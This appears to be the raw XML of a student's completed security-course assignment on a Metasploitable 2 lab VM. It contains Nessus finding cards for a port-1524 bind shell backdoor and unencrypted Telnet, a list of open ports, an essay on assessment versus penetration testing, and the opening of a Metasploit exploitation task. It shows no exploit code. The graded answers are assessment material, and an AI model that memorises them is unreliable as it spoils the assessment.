                <w:bCs w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">[30 marks]</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000058">
      <w:pPr>
        <w:spacing w:before="120" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">What you need to do:</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t xml:space="preserve">Open the scan results in Nessus. Explore individual findings and record the details for the most important ones.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005A">
      <w:pPr>
        <w:spacing w:before="120" w:lineRule="au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scan results, identify ONE Critical or High severity vulnerability. Fill in the finding card:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005C">
      <w:pPr>
        <w:spacing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1"/>
                <w:bCs w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Vulnerability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E">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Bind Shell Backdoor Detection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1"/>
                <w:bCs w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Severity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0">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Critical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1"/>
                <w:bCs w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">CVE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2">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">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1"/>
                <w:bCs w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Affected Port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4">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Port 1524 / tcp — wild_shell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1"/>
                <w:bCs w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">What does this vulnerability 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6">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">A bind shell backdoor is running on the target system without authentication. An attacker can connect to the remote shell and execute commands directly on the machine.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1"/>
                <w:bCs w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">What could an attacker do with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8">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">An attacker could gain unauthorized remote access and fully control the system. They may steal data, modify files, install malware, or compromise the entire machine.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1"/>
                <w:bCs w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Fix /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A">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Remove the backdoor service immediately and check if the system has been compromised. Reinstall or patch the system, apply security updates, and restrict unauthorized remote access. </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006B">
      <w:pPr>
        <w:spacing w:after="80" w:before="80" w:lineRule="auto"/>
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:color w:val="555555"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:color w:val="555555"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5434013" cy="258570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34013" cy="258570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i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:color w:val="555555"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">va2_critical_finding.png</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006D">
      <w:pPr>
        <w:spacing w:before="16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ONE Medium severity vulnerability and fill in a shorter card:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006F">
      <w:pPr>
        <w:spacing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75.0" w:type="dxa"/>
              <w:left w:w="100.0" w:type="dxa"/>
              <w:bottom w:w="75.0" w:type="dxa"/>
              <w:right w:w="100.0" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000070">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Vulnerability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5.0" w:type="dxa"/>
              <w:left w:w="100.0" w:type="dxa"/>
              <w:bottom w:w="75.0" w:type="dxa"/>
              <w:right w:w="100.0" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000071">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Unencrypted Telnet Server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75.0" w:type="dxa"/>
              <w:left w:w="100.0" w:type="dxa"/>
              <w:bottom w:w="75.0" w:type="dxa"/>
              <w:right w:w="100.0" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000072">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">CVE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5.0" w:type="dxa"/>
              <w:left w:w="100.0" w:type="dxa"/>
              <w:bottom w:w="75.0" w:type="dxa"/>
              <w:right w:w="100.0" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000073">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">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75.0" w:type="dxa"/>
              <w:left w:w="100.0" w:type="dxa"/>
              <w:bottom w:w="75.0" w:type="dxa"/>
              <w:right w:w="100.0" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000074">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Affected Port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5.0" w:type="dxa"/>
              <w:left w:w="100.0" w:type="dxa"/>
              <w:bottom w:w="75.0" w:type="dxa"/>
              <w:right w:w="100.0" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000075">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Port 23 / tcp — Telnet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75.0" w:type="dxa"/>
              <w:left w:w="100.0" w:type="dxa"/>
              <w:bottom w:w="75.0" w:type="dxa"/>
              <w:right w:w="100.0" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000076">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Brief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5.0" w:type="dxa"/>
              <w:left w:w="100.0" w:type="dxa"/>
              <w:bottom w:w="75.0" w:type="dxa"/>
              <w:right w:w="100.0" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000077">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">The Telnet service sends usernames, passwords, and commands without encryption.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000078">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Attackers can capture sensitive information from the network traffic.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75.0" w:type="dxa"/>
              <w:left w:w="100.0" w:type="dxa"/>
              <w:bottom w:w="75.0" w:type="dxa"/>
              <w:right w:w="100.0" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000079">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Fix /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5.0" w:type="dxa"/>
              <w:left w:w="100.0" w:type="dxa"/>
              <w:bottom w:w="75.0" w:type="dxa"/>
              <w:right w:w="100.0" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007A">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Disable the Telnet service and use SSH instead for secure remote access. </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007B">
      <w:pPr>
        <w:spacing w:after="80" w:before="80" w:lineRule="auto"/>
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:color w:val="555555"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:color w:val="555555"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5124891" cy="241754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24891" cy="241754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i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:color w:val="555555"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">va2_medium_finding.png</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007D">
      <w:pPr>
        <w:spacing w:before="160" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007E">
      <w:pPr>
        <w:spacing w:before="160" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007F">
      <w:pPr>
        <w:spacing w:before="160" w:lineRule="auto"/>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full list of open ports and services that Nessus detected. List any SIX below:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000081">
      <w:pPr>
        <w:spacing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000"/>
        <w:gridCol w:w="4800"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="1560"/>
            <w:gridCol w:w="30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70.0" w:type="dxa"/>
              <w:left w:w="100.0" w:type="dxa"/>
              <w:bottom w:w="70.0" w:type="dxa"/>
              <w:right w:w="100.0" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000082">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="ffffff"/>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70.0" w:type="dxa"/>
              <w:left w:w="100.0" w:type="dxa"/>
              <w:bottom w:w="70.0" w:type="dxa"/>
              <w:right w:w="100.0" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000083">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="ffffff"/>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70.0" w:type="dxa"/>
              <w:left w:w="100.0" w:type="dxa"/>
              <w:bottom w:w="70.0" w:type="dxa"/>
              <w:right w:w="100.0" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000084">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="ffffff"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Notes / Nessus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5">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">23</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tl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Telnet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tl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Unencrypted remote access service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8">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">1524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tl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">wild_shell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tl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Bind shell backdoor detected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B">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">80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tl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">HTTP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tl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Web server detected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E">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">22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tl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">SSH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tl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Secure remote login service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1">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">25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tl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">SMTP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tl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Mail server running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4">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">445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tl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">SMB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tl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Samba file sharing service </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000097">
      <w:pPr>
        <w:spacing w:before="100" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000098">
      <w:pPr>
        <w:spacing w:before="100" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000099">
      <w:pPr>
        <w:spacing w:before="100" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009A">
      <w:pPr>
        <w:spacing w:before="100" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009B">
      <w:pPr>
        <w:spacing w:before="100" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009C">
      <w:pPr>
        <w:spacing w:before="100" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009D">
      <w:pPr>
        <w:spacing w:before="10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own words, explain the difference between a Vulnerability Assessment and a Penetration Test. (3–4 sentences)</w:t>
      </w:r>
    </w:p>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2"/>
          <w:szCs w:val="22"/>
          <w:u w:val="none"/>
          <w:shd w:fill="auto" w:val="clear"/>
          <w:vertAlign w:val="baseline"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">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Vulnerability Assessment is a check that looks for weak points in a system and lists possible security problems. A Penetration Test is a more active test that tries to use those weak points to see how much damage could happen. The main purpose of a Vulnerability Assessment is to </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">identify and report risks, while a Penetration Test is to determine whether those risks can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t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">exploited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key difference is that one only finds problems, but the other tries </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">to test them in action safely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spacing w:before="2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3">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:color="c00000" w:space="0" w:sz="8" w:val="single"/>
        </w:pBdr>
        <w:spacing w:after="100" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="c00000"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SECTION B: PENETRATION TESTING  (50 marks)</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i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Now you will use what you found in Section A and actively exploit a vulnerability on Metasploitable 2 using the Metasploit Framework on Kali Linux. You will then document your findings as a short PT report.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A5">
      <w:pPr>
        <w:spacing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800"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="75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60.0" w:type="dxa"/>
              <w:bottom w:w="80.0" w:type="dxa"/>
              <w:right w:w="120.0" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A6">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">PT Task 1: Exploitation with Metasploit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b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">[30 marks]</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A8">
      <w:pPr>
        <w:spacing w:before="120" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">What you need to do:</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tl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Use Metasploit Framework to exploit ONE of the vulnerabilities below. Step-by-step commands are provided as guidance. Follow them, record the outputs, and paste your screenshots.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000AA">
      <w:pPr>
        <w:spacing w:before="120" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="c00000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Choose ONE exploit to attempt:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000AB">
      <w:pPr>
        <w:spacing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
        <w:gridCol w:w="2661"/>
        <w:gridCol w:w="2213"/>
